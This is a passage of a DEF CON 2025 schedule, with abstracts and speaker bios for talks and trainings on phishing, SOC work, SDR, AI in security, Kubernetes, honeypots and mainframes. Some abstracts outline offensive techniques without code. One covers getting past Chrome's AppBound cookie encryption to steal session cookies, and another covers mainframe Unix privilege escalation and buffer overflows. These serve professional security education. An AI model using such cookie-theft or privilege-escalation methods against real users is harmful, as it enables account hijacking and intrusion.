Chen Levy Ben Aroy is a distinguished cybersecurity leader with a proven track record in cloud security, penetration testing, and red teaming. As a Cloud Security Research Team Lead at Varonis, Chen spearheads cutting-edge security research and innovation across multiple cloud-providers and platforms. His previous roles at well-known enterprises, such as Prosche Digital and ABInbev, showcased his expertise in advanced malware development and strategic project management. With a robust background in a wide array of cybersecurity domains, Chen's visionary approach and technical acumen make him a sought-after expert in the industry.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 15:30-16:15 PDT


Title: So Long, and Thanks for All the Phish
When: Friday, Aug 8, 15:30 - 16:15 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

A rare look behind the scenes of a global phishing-as-a-service operation. We tell the story of how we infiltrated a phishing group, cracked their software, exploited a hidden backdoor, and followed an OSINT rabbit hole to uncover the identify of the primary software developer.

Speakers:Harrison Sand,Erlend Leiknes

SpeakerBio:  Harrison Sand

Harrison is a software and application security specialist with experience in embedded devices and IoT. He has worked closely with penetration testing, incident response, embedded security, and vulnerability management. He has a passion for cybersecurity research and has had work featured in publications such as TechCrunch, PC Magazine, The Register, Ars Technica, Hackaday, Aftenposten, and NRK.

SpeakerBio:  Erlend Leiknes

Erlend is a man of many towels (and talents)—a security consultant and retired bus driver, electrical engineer, and masters degree in technical societal safety. Erlend has gravitated towards hacking and IT since his teens and spent more than a decade at mnemonic as a security consultant, where he performs penetration testing, red teaming and conducts security research. A handful of CVEs have his name on it and some are even favored by the usual APTs—and in the spirit of Douglas Adams, there's no need to panic.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: SOC 101 - SOC 1 Analyst Bootcamp
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This course introduces students to Security Operations Center (SOC) skills and tools, providing a comprehensive foundation in the essential skills required for SOC analysts. Through extensive hands-on exercises and labs that mirror real-life SOC tasks and technologies, students will gain a practical, skill-based understanding of modern security operations.

Key areas of focus will include text handling, packet dissection, and analysis, adversarial simulation, and detection engineering, equipping students with the expertise needed for various SOC tasks. The course emphasizes practical, foundational skills to ensure students are prepared to excel at core SOC tasks, this course will also introduce students to AI tools that improve SOC efficiency, accuracy, and response time in a rapidly evolving security landscape.

SpeakerBio:  Rod Soto, Detection Engineer and Researcher at Splunk Threat Research Team

Rod Soto has over 15 years of experience in information technology and security. He has worked in Security Operations Centers as a support engineer, soc engineer, security emergency response, and incident response. He is currently working as a detection engineer and researcher at Splunk Threat Research Team and has previously worked at Prolexic/AKAMAI, Splunk UBA, JASK (SOC Automation).

Rod Soto was the winner of the 2012 BlackHat Las Vegas CTF competition and Red Alert ICS CTF at DEFCON 2022 contest. He has spoken at ISSA, ISC2, OWASP, DEFCON, RSA Conference,Hackmiami, DerbyCon, Splunk .CONF, Black Hat,BSides, Underground Economy and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision, BBC, Forbes, VICE, Fox News and CNN.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: SOC 101 - SOC 1 Analyst Bootcamp
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This course introduces students to Security Operations Center (SOC) skills and tools, providing a comprehensive foundation in the essential skills required for SOC analysts. Through extensive hands-on exercises and labs that mirror real-life SOC tasks and technologies, students will gain a practical, skill-based understanding of modern security operations.

Key areas of focus will include text handling, packet dissection, and analysis, adversarial simulation, and detection engineering, equipping students with the expertise needed for various SOC tasks. The course emphasizes practical, foundational skills to ensure students are prepared to excel at core SOC tasks, this course will also introduce students to AI tools that improve SOC efficiency, accuracy, and response time in a rapidly evolving security landscape.

SpeakerBio:  Rod Soto, Detection Engineer and Researcher at Splunk Threat Research Team

Rod Soto has over 15 years of experience in information technology and security. He has worked in Security Operations Centers as a support engineer, soc engineer, security emergency response, and incident response. He is currently working as a detection engineer and researcher at Splunk Threat Research Team and has previously worked at Prolexic/AKAMAI, Splunk UBA, JASK (SOC Automation).

Rod Soto was the winner of the 2012 BlackHat Las Vegas CTF competition and Red Alert ICS CTF at DEFCON 2022 contest. He has spoken at ISSA, ISC2, OWASP, DEFCON, RSA Conference,Hackmiami, DerbyCon, Splunk .CONF, Black Hat,BSides, Underground Economy and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision, BBC, Forbes, VICE, Fox News and CNN.


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Sunday - 10:00-10:45 PDT


Title: Social Engineering Community Village - Contest Awards
When: Sunday, Aug 10, 10:00 - 10:45 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

See who won in our village! During this time weíll present the SECVC and BOTB winners, as well as the much-coveted Dundies!


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Sunday - 10:00-11:30 PDT


Title: Social Engineering Community Village - Village Open
When: Sunday, Aug 10, 10:00 - 11:30 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Welcome to our last day at DEF CON!


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Friday - 08:30-17:59 PDT


Title: Social Engineering Community Village - Village Open
When: Friday, Aug 8, 08:30 - 17:59 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Rise & shine, social engineers! Swing by to get your SEC merch, and claim your throne, because the phones start ringin' soon!


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Saturday - 10:00-17:59 PDT


Title: Social Engineering Community Village - Village Open
When: Saturday, Aug 9, 10:00 - 17:59 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

We're kicking off right at 1000! Don't forget to check out our Merch table in the back of the village!


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Friday - 08:30-08:59 PDT


Title: Social Engineering Community Village Greeting and 2025 Badge Overview
When: Friday, Aug 8, 08:30 - 08:59 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Every year, electronic badges light up DEF CON, sparking creativity, community, and curiosity. But behind the blinking LEDs and clever puzzles are questions we rarely ask: How safe is this badge for its users? What's its environmental footprint? In this talk, we'll dive into the design of "The SEC Village Badge" from concept to execution - but more importantly, we'll explore a proposed framework for badge makers to disclose key safety information and environmental impact of their creation. From battery safety considerations and materials selection to end-of-life recycling and disposal, we'll discuss how transparency can empower the community, inspire more responsible design, and keep the badge life culture thriving sustainably. Whether you're a seasoned hardware hacker, a first-time badge maker, or just curious about what goes into creating these wearable works of art, this talk will challenge us to think beyond the soldering iron and consider the broader impact of our creations.

SpeakerBio:  Brent "TheDukeZip" Dukes

Brent is a long time hacker and DEF CON attendee that has designed various electronic badges throughout the years. He may be the all time champion at coming in second place in DEF CON competitions (but let's be honest, he'd probably turn out to be second place in that too!)


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Software Defined Radios 101
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Software Defined Radios (SDRs) are a powerful tool that has made the once-obfuscated domain of the electromagnetic spectrum open to anyone with a low-cost laptop and radio. From both an offensive and defensive perspective, an enormous attack surface, with many legacy devices and protocols, is open for exploitation. SDR 101 is a course designed for cyber security professionals of all skill levels who want to start working with RF signals and SDRs.

This class is a beginner's introduction to practical Software Defined Radio applications and development with an emphasis on hands-on learning. If you have ever been curious about the invisible world of radio waves and signals all around you, but didn't know where to begin, then this course is for you. Students can expect to learn about basic RF theory and SDR architecture before moving on to hands-on development with real radios. Over the two-day course, the instructor will guide students through progressively more complicated RF concepts and waveforms, culminating in a small capstone exercise. Students will be provided with a HackRF SDR for the duration of the class but will need to bring their own laptop to interface with the radio. VMs will be made available to students to download before class, along with an OS setup guide for those that prefer a bare-metal install. The VM/OS will have all the required drivers and frameworks to interface with the radio hardware, allowing us to jump right into hands-on exercises. My intent for this course is to lower the barrier of entry associated with RF hacking and give beginning students a practical understanding of RF and DSP applications with SDRs.

SpeakerBio:  Richard Shmel

Richard Shmel is an experienced research and development engineer focusing on radio communications and digital signals processing applications. He has over a decade of experience as an RF engineer and embedded software developer working on prototype radio systems and DSP frameworks. Disappointed by the lack of introductory SDR material he could give to new engineers, he decided to write his own training courses to help fill the gap. Richard has had the privilege of teaching SDR workshops and training at various local and national cyber security conferences - including DEF CON - for many years now. He is passionate about teaching RF/DSP and wireless technology, and will happily talk for hours on the subject if given the chance. Learn more at https://www.rnstechsolutions.com/.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Software Defined Radios 101
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Software Defined Radios (SDRs) are a powerful tool that has made the once-obfuscated domain of the electromagnetic spectrum open to anyone with a low-cost laptop and radio. From both an offensive and defensive perspective, an enormous attack surface, with many legacy devices and protocols, is open for exploitation. SDR 101 is a course designed for cyber security professionals of all skill levels who want to start working with RF signals and SDRs.

This class is a beginner's introduction to practical Software Defined Radio applications and development with an emphasis on hands-on learning. If you have ever been curious about the invisible world of radio waves and signals all around you, but didn't know where to begin, then this course is for you. Students can expect to learn about basic RF theory and SDR architecture before moving on to hands-on development with real radios. Over the two-day course, the instructor will guide students through progressively more complicated RF concepts and waveforms, culminating in a small capstone exercise. Students will be provided with a HackRF SDR for the duration of the class but will need to bring their own laptop to interface with the radio. VMs will be made available to students to download before class, along with an OS setup guide for those that prefer a bare-metal install. The VM/OS will have all the required drivers and frameworks to interface with the radio hardware, allowing us to jump right into hands-on exercises. My intent for this course is to lower the barrier of entry associated with RF hacking and give beginning students a practical understanding of RF and DSP applications with SDRs.

SpeakerBio:  Richard Shmel

Richard Shmel is an experienced research and development engineer focusing on radio communications and digital signals processing applications. He has over a decade of experience as an RF engineer and embedded software developer working on prototype radio systems and DSP frameworks. Disappointed by the lack of introductory SDR material he could give to new engineers, he decided to write his own training courses to help fill the gap. Richard has had the privilege of teaching SDR workshops and training at various local and national cyber security conferences - including DEF CON - for many years now. He is passionate about teaching RF/DSP and wireless technology, and will happily talk for hours on the subject if given the chance. Learn more at https://www.rnstechsolutions.com/.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Solving Modern Cybersecurity Problems with AI
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Since our sold out class in 2024, we have refreshed the material to incorporate not only Agentic AI but Content Augmentation Generation (CAG)!

Have you ever wondered how the pros use AI to solve their complex cybersecurity problems? Come find out!

Artificial Intelligence (AI) and Large Language Models (LLMs) have emerged as robust and powerful tools that have redefined how many approach problem solving. The last few years have seen industry AI interest surge while Cybersecurity experts struggle not only to threat model LLMs but to leverage them effectively. Our training presents a comprehensive educational framework aimed at equipping students with the necessary skills to not only build their own LLM toolkits but to leverage AI and LLMs to build elegant solution to solve complex problems unique to their own environments.

This class will teach students how to build their own AI frameworks to ingest data from either SaaS or on-prem data lakes. We will provide both the tools for data data consumption but as well as data warehousing. From there we will walk students through transforming this data and making it operationally effective and efficient for their AI. We will cover various types of data common to Cybersecurity environments, protentional issues with certain data types, and how to make the most of opensource to help transform the data. We will also touch on training and LoRA for model customization.

As Cybersecurity experts, we also need to understand the risk that comes with the use of AI. For this purpose, we will discuss foundational knowledge to conduct both red and blue team exercises regarding AI. We will discuss risk analysis of the disparate components used to make AI functional, a holistic and functional approach to defending the supply chain, understanding vulnerability analysis, and modern day adversary attacks and techniques that you will encounter. Understanding modern security policy frameworks is just as important and we will cover a few of the popular frameworks used to secure and apply policy to your AI environment. We will cap this section of class off with a practicum of both attacking and defending our AI deployed in class.

Using the tools created in class, we will use the SOCMAN DEF CON model to solve hand-picked operational problems we have seen teams struggle with all over the world. You will learn how to use LLMs with agentic AI, how to augment our queries with our own data in two different methods (RAG/CAG), generate high quality YARA/SIGMA rules using your own data, tune your model to hunt complex patterns, improve application observability by adding context to "weird" behavior, how to hunt for APTs using real world scenarios and logs (Stuxnet), filter out noise to increase signal in your environment (SNR), and much more! All of these labs will be performed by students and will leverage AI as middleware to add contextual data between disparate platforms to solve your complex cybersecurity problems. All use cases will be performed by students live and in-class.

By the end of this training you will be able to:

Speakers:“K” Singh,Michael "Bluescreenofwin" Glass

SpeakerBio:  “K” Singh, Senior Incident Response Consultant at CrowdStrike

“K” Singh is currently a Senior Incident Response Consultant at CrowdStrike. Previously an Incident Response Consultant and the Forensic Lab Manager for the Global Incident Response Practice at Cylance – “K” has worked with multiple Fortune 500 companies, sector-leading firms, and healthcare organizations in a variety of engagements ranging from Incident Response to Traditional “Dead Disk” Forensics and E-Discovery. Additionally, “K” is also part of the Operations team for WRCCDC-handling infrastructure for the competition’s core cluster, student environments, Social Media outlets, and liaising between the Red Team and other teams to ensure the competition runs smoothly.

SpeakerBio:  Michael "Bluescreenofwin" Glass, Founder at Glass Security Consulting

Michael Glass AKA "Bluescreenofwin" is currently a Principal Security Engineer providing security leadership for one of the largest streaming technology companies in the world specializing in Blue Team, SecOps, and Cloud. Michael has been in the hacking and security scene for over 15 years working for a wide variety of organizations including government, private, and non-profit. Using this diverse background he has founded the company "Glass Security Consulting" in order to provide world class Cybersecurity instruction for Information Security Professionals and Hackers alike.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Solving Modern Cybersecurity Problems with AI
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Since our sold out class in 2024, we have refreshed the material to incorporate not only Agentic AI but Content Augmentation Generation (CAG)!

Have you ever wondered how the pros use AI to solve their complex cybersecurity problems? Come find out!

Artificial Intelligence (AI) and Large Language Models (LLMs) have emerged as robust and powerful tools that have redefined how many approach problem solving. The last few years have seen industry AI interest surge while Cybersecurity experts struggle not only to threat model LLMs but to leverage them effectively. Our training presents a comprehensive educational framework aimed at equipping students with the necessary skills to not only build their own LLM toolkits but to leverage AI and LLMs to build elegant solution to solve complex problems unique to their own environments.

This class will teach students how to build their own AI frameworks to ingest data from either SaaS or on-prem data lakes. We will provide both the tools for data data consumption but as well as data warehousing. From there we will walk students through transforming this data and making it operationally effective and efficient for their AI. We will cover various types of data common to Cybersecurity environments, protentional issues with certain data types, and how to make the most of opensource to help transform the data. We will also touch on training and LoRA for model customization.

As Cybersecurity experts, we also need to understand the risk that comes with the use of AI. For this purpose, we will discuss foundational knowledge to conduct both red and blue team exercises regarding AI. We will discuss risk analysis of the disparate components used to make AI functional, a holistic and functional approach to defending the supply chain, understanding vulnerability analysis, and modern day adversary attacks and techniques that you will encounter. Understanding modern security policy frameworks is just as important and we will cover a few of the popular frameworks used to secure and apply policy to your AI environment. We will cap this section of class off with a practicum of both attacking and defending our AI deployed in class.

Using the tools created in class, we will use the SOCMAN DEF CON model to solve hand-picked operational problems we have seen teams struggle with all over the world. You will learn how to use LLMs with agentic AI, how to augment our queries with our own data in two different methods (RAG/CAG), generate high quality YARA/SIGMA rules using your own data, tune your model to hunt complex patterns, improve application observability by adding context to "weird" behavior, how to hunt for APTs using real world scenarios and logs (Stuxnet), filter out noise to increase signal in your environment (SNR), and much more! All of these labs will be performed by students and will leverage AI as middleware to add contextual data between disparate platforms to solve your complex cybersecurity problems. All use cases will be performed by students live and in-class.

By the end of this training you will be able to:

Speakers:“K” Singh,Michael "Bluescreenofwin" Glass

SpeakerBio:  “K” Singh, Senior Incident Response Consultant at CrowdStrike

“K” Singh is currently a Senior Incident Response Consultant at CrowdStrike. Previously an Incident Response Consultant and the Forensic Lab Manager for the Global Incident Response Practice at Cylance – “K” has worked with multiple Fortune 500 companies, sector-leading firms, and healthcare organizations in a variety of engagements ranging from Incident Response to Traditional “Dead Disk” Forensics and E-Discovery. Additionally, “K” is also part of the Operations team for WRCCDC-handling infrastructure for the competition’s core cluster, student environments, Social Media outlets, and liaising between the Red Team and other teams to ensure the competition runs smoothly.

SpeakerBio:  Michael "Bluescreenofwin" Glass, Founder at Glass Security Consulting

Michael Glass AKA "Bluescreenofwin" is currently a Principal Security Engineer providing security leadership for one of the largest streaming technology companies in the world specializing in Blue Team, SecOps, and Cloud. Michael has been in the hacking and security scene for over 15 years working for a wide variety of organizations including government, private, and non-profit. Using this diverse background he has founded the company "Glass Security Consulting" in order to provide world class Cybersecurity instruction for Information Security Professionals and Hackers alike.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 12:00-12:30 PDT


Title: Sometimes you find bugs, sometimes bugs find you
When: Saturday, Aug 9, 12:00 - 12:30 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Bug bounty hunting is often portrayed as methodical recon, crafted payloads, and targeted testing. But sometimes, the most interesting vulnerabilities don’t come from planned attacks — they come from the chaos. In this talk, I’ll walk through a handful of real bugs I’ve reported over the years that found me instead.

SpeakerBio:  Jasmin "JR0ch17" Landry

Jasmin Landry is a seasoned ethical hacker and full-time bug bounty hunter who has reported hundreds of security vulnerabilities to some of the world’s largest tech companies. After years leading cybersecurity efforts as Senior Director of Information Security at Nasdaq, Jasmin returned to his roots in hacking — now focusing exclusively on uncovering critical bugs through bug bounty platforms. Recognized at multiple live hacking events for top findings, he brings a sharp eye for unexpected issues and a deep understanding of modern attack surfaces. He’s also a co-leader of OWASP Montréal and an active voice in the security research community.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 18:00-20:59 PDT


Title: Spades Tournament & Game Night Social
When: Friday, Aug 8, 18:00 - 20:59 PDT
Where: LVCCWest-Level3-W322-W324 - Map

Description:

Join Us for the Ultimate Spades Tournament & Game Night Social! Looking for a fun way to unwind, connect, and enjoy some friendly competition? Our Spades Tournament & Game Night Social is the perfect way to relax while engaging in a classic card game that brings people together.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 16:00-16:45 PDT


Title: Spotter - Universal Kubernetes Security Scanner and Policy Enforcer
When: Saturday, Aug 9, 16:00 - 16:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

Spotter is a groundbreaking open-source tool designed to secure Kubernetes clusters throughout their lifecycle. Built on the native tooling of Kubernetes by leveraging Common Expression Language for policy definitions, we can define unified security scanning across development, CLI, CI/CD, admission controllers, deployments, runtime, and continuous monitoring. Its unique approach enables both enforcement and monitoring modes, ensuring that policies can be applied consistently and mapped directly to industry standards such as CIS and MITRE ATT&CK. Spotter provides extremely high flexibility across all Kubernetes phases, providing an innovative approach that no other open-source or commercial solution can replicate. It seamlessly bridges security, DevOps, and platform teams, effectively solving the real-world challenges faced by day-to-day operations.

SpeakerBio:  Madhu "madhuakula" Akula, Pragmatic Security Leader

Madhu Akula is a pragmatic security leader and creator of Kubernetes Goat, an intentionally vulnerable by design Kubernetes Cluster to learn and practice Kubernetes Security. Also published author and Cloud Native Security Architect with extensive experience. Also, he is an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc). He holds industry certifications like CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), OSCP (Offensive Security Certified Professional), etc.

Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.

His research has identified vulnerabilities in over 200+ companies and organizations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, Adobe, etc. and is credited with multiple CVE’s, Acknowledgements, and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He is the technical reviewer for Learn Kubernetes Security, Practical Ansible2 books by Packt Pub. Also won 1st prize for building an Infrastructure Security Monitoring solution at InMobi flagship hackathon among 100+ engineering teams.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 09:00-09:45 PDT


Title: Spotter - Universal Kubernetes Security Scanner and Policy Enforcer
When: Friday, Aug 8, 09:00 - 09:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

Spotter is a groundbreaking open-source tool designed to secure Kubernetes clusters throughout their lifecycle. Built on the native tooling of Kubernetes by leveraging Common Expression Language for policy definitions, we can define unified security scanning across development, CLI, CI/CD, admission controllers, deployments, runtime, and continuous monitoring. Its unique approach enables both enforcement and monitoring modes, ensuring that policies can be applied consistently and mapped directly to industry standards such as CIS and MITRE ATT&CK. Spotter provides extremely high flexibility across all Kubernetes phases, providing an innovative approach that no other open-source or commercial solution can replicate. It seamlessly bridges security, DevOps, and platform teams, effectively solving the real-world challenges faced by day-to-day operations.

SpeakerBio:  Madhu "madhuakula" Akula, Pragmatic Security Leader

Madhu Akula is a pragmatic security leader and creator of Kubernetes Goat, an intentionally vulnerable by design Kubernetes Cluster to learn and practice Kubernetes Security. Also published author and Cloud Native Security Architect with extensive experience. Also, he is an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc). He holds industry certifications like CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), OSCP (Offensive Security Certified Professional), etc.

Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.

His research has identified vulnerabilities in over 200+ companies and organizations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, Adobe, etc. and is credited with multiple CVE’s, Acknowledgements, and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He is the technical reviewer for Learn Kubernetes Security, Practical Ansible2 books by Packt Pub. Also won 1st prize for building an Infrastructure Security Monitoring solution at InMobi flagship hackathon among 100+ engineering teams.


Return to Index    -    Add to Google    -    ics Calendar file

PHV - Saturday - 16:00-16:59 PDT


Title: SSH Honeypots and Walkthrough Workshops: A History
When: Saturday, Aug 9, 16:00 - 16:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

At DEF CON 24, an SSH honeypot on the open network held a puzzle that would go on to inspire the first Walkthrough Workshop. Although the Walkthrough Workshops at the Packet Hacking Village no longer feature Cowrie, its echoes live on at DEF CON. Out of the box, Cowrie is a medium-interaction SSH honeypot, but this level of interaction can be raised with a little elbow grease. From custom commands and adventure games to file systems laid out as spatial cubes, this talk explores several years of Cowrie-based challenges that will bash your expectations of terminal interaction.

SpeakerBio:  Ryan Mitchell, Principal Software Engineer at Gerson Lehrman Group

Ryan Mitchell is a staff member at the Packet Hacking Village and the author of Unlocking Python (Wiley), Web Scraping with Python (O’Reilly), and multiple courses on LinkedIn Learning including Python Essential Training. She holds a master’s degree in software engineering from Harvard University Extension School and has worked as principal software engineer and data scientist on the search and artificial intelligence teams at the Gerson Lehrman Group for the last six years.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 10:00-10:45 PDT


Title: SSH-nanigans: Busting Open the Mainframes Iron Fortress through Unix
When: Sunday, Aug 10, 10:00 - 10:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

You may have heard tales of mainframe pentesting and exploitation before - mostly from us! Those stories often focused on the MVS/ISPF side of the IBM z/OS. But did you know that all those same tricks (and more!) can be pulled off in z/OS Unix System Services (OMVS) as well? I bet you didn't even know z/OS had a UNIX side!

Over the years we've discovered multiple unique attack paths when it comes to Unix on the mainframe. In this talk, we'll present live demos of real-world scenarios we've encountered during mainframe penetration tests. These examples will showcase what can happen with poor file hygiene leading to database compromises, inadequate file permissions enabling privilege escalation, lack of ESM resource understanding allowing for privileged command execution, and how dataset protection won't save you from these attacks. We'll also be demonstrating what can happen when we overflow the buffer in an APF authorized dataset.

Attendees will learn how to test these controls themselves using freely available open-source tools and how to (partially) detect these attacks. While privesc in UNIX isn't game over for your mainframe, it's pretty close. By the end, it will be clear that simply granting superuser access to Unix can be just as dangerous, if not more so, than giving access to TSO on the mainframe.

SpeakerBio:  Philip "Soldier of FORTRAN" Young

Philip Young, aka Soldier of FORTRAN, Director of Mainframe Penetration Testing Services at NetSPI is an oldschool hacker. He started out on with an Amiga 500 and a modem and never looked back, cutting his teeth on Datapac (the Canadian X.25 network) he eventually grew to searching the internet for interesting things. Later in his career he started taking a serious look at mainframe cybersecurity and realized how far behind mainframes had fallen when compared to their more open system (Windows/Linux). At that point he made it his lifes mission to raise awareness and produce tooling to aid in the testing of these critical resources to help keep them safe. Since then he has given talks around the world at places like BlackHat, DEFCON, RSA, has taught multiple workshops and was even under investigation by the Swedish secret police. In addition he has released countless opensources tools to pentest mainframes.


Return to Index    -    Add to Google    -    ics Calendar file

PLV - Friday - 11:00-11:45 PDT


Title: State of Open Source in the Federal Government
When: Friday, Aug 8, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W231 - Map

Description:
SpeakerBio:  Jordan Kasper
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MHV - Saturday - 11:30-11:59 PDT


Title: State of the Pops: Mapping the Digital Waters
When: Saturday, Aug 9, 11:30 - 11:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

The maritime industry is rapidly digitizing, but how well is it securing its foundational digital infrastructure? In this talk, we present the results of a large-scale passive reconnaissance effort targeting the top 50 global maritime organizations—leveraging only open source intelligence (OSINT) and LLM-assisted analysis. By focusing on core security controls such as DNS, email authentication protocols, and other foundational internet services, we uncover a troubling landscape. All data was collected non-intrusively and ethically, relying exclusively on public data. Results will be presented in an anonymized and aggregated fashion, with a strong emphasis on reproducibility. In true hacker village spirit, we will release all scripts and tools used—empowering attendees to replicate the analysis, audit other industries, or expand upon our methodology. This session will not only highlight the maritime sector’s digital weaknesses but also demonstrate how anyone with OSINT skills and curiosity can surface meaningful insights about critical industries—with zero packets sent to the targets.

Speakers:Vlatko Kosturjak,MJ Casado

SpeakerBio:  Vlatko Kosturjak, Marlink Cyber

Vlatko Kosturjak serves as the VP of research at Marlink Cyber, boasting over two decades of dedicated experience in the realms of information security and cybersecurity. His diverse roles over the years have not only equipped him with a comprehensive understanding of security governance but also delved into the deep technical side of security. He have successful M&A experience in different fields of cyber security including application security.

Vlatko finds joy in both breaking and building security controls. Beyond his commitment to security, he harbors a deep passion for open and free software. This passion has manifested in the creation of numerous popular open-source offensive tools and contributions to various renowned free security software projects.

Throughout his extensive career and in his continuous pursuit of knowledge in the dynamic field of cybersecurity, Vlatko has acquired a long array of certifications, including CISSP, OSCP, CISM, and many more.

SpeakerBio:  MJ Casado
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 14:00-15:50 PDT


Title: Stealing Browser Cookies: Bypassing the newest Chrome security measures
When: Friday, Aug 8, 14:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 2 - Map

Description:

This session explores advanced security mechanisms implemented by major browsers to prevent cookie theft from their storage databases. Chrome has recently implemented AppBound encryption, which provides multi-layered protection for session cookies:

1) A 2-way DPAPI encryption system that operates with both elevated NT AUTHORITY\SYSTEM permissions and normal user-level decryption capabilities;

2) A state-key encryption layer utilizing the ChaCha20Poly1305 algorithm with custom keys (that once was AES-256-GCM encrypted);

These implementations have significantly reduced the effectiveness of info-stealing malware. However, this session will demonstrate potential vulnerabilities in these security measures and explain how to obtain decrypted cookies despite these protections. We will examine the new format specifications and encryption methodologies for cookies.

Beyond Chromium-based browsers, we'll explore Gecko's encryption algorithms, which involve structured ASN.1 data formats with multiple encryption schemes including 3DES and AES-256. We'll also analyze Chromium on macOS which relies on PBKDF2 key derivation, and WebKit-based browsers that store cookies in binary cookie files.

Additionally, we'll discuss Chrome's forthcoming "Device Bound Session Cookies" (DBSC) technology, which aims to further mitigate session hijacking through cookie theft by implementing TPM chip-based encryption and requiring proof of possession of the cryptographic key.

SpeakerBio:  Rafael Felix

Rafael has been working with malware development for 4 years, also being involved in the malware community for more than 6 years. He is also experienced in Incident and Response, specifically during malware inner workings analysis. Currently, Rafael is a researcher for Hakai Offensive Security, being deeply involved with red-team operations.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 12:00-12:50 PDT


Title: Stealing Browser Cookies: Bypassing the newest Chrome security measures
When: Friday, Aug 8, 12:00 - 12:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 3 - Map

Description:
NOTE: There is an accompanying tactic that goes along with this workshop which will begin after the workshop completes.

This session explores advanced security mechanisms implemented by major browsers to prevent cookie theft from their storage databases. Chrome has recently implemented AppBound encryption, which provides multi-layered protection for session cookies:

1) A 2-way DPAPI encryption system that operates with both elevated NT AUTHORITY\SYSTEM permissions and normal user-level decryption capabilities;

2) A state-key encryption layer utilizing the ChaCha20Poly1305 algorithm with custom keys (that once was AES-256-GCM encrypted);

These implementations have significantly reduced the effectiveness of info-stealing malware. However, this session will demonstrate potential vulnerabilities in these security measures and explain how to obtain decrypted cookies despite these protections. We will examine the new format specifications and encryption methodologies for cookies.

Beyond Chromium-based browsers, we'll explore Gecko's encryption algorithms, which involve structured ASN.1 data formats with multiple encryption schemes including 3DES and AES-256. We'll also analyze Chromium on macOS which relies on PBKDF2 key derivation, and WebKit-based browsers that store cookies in binary cookie files.

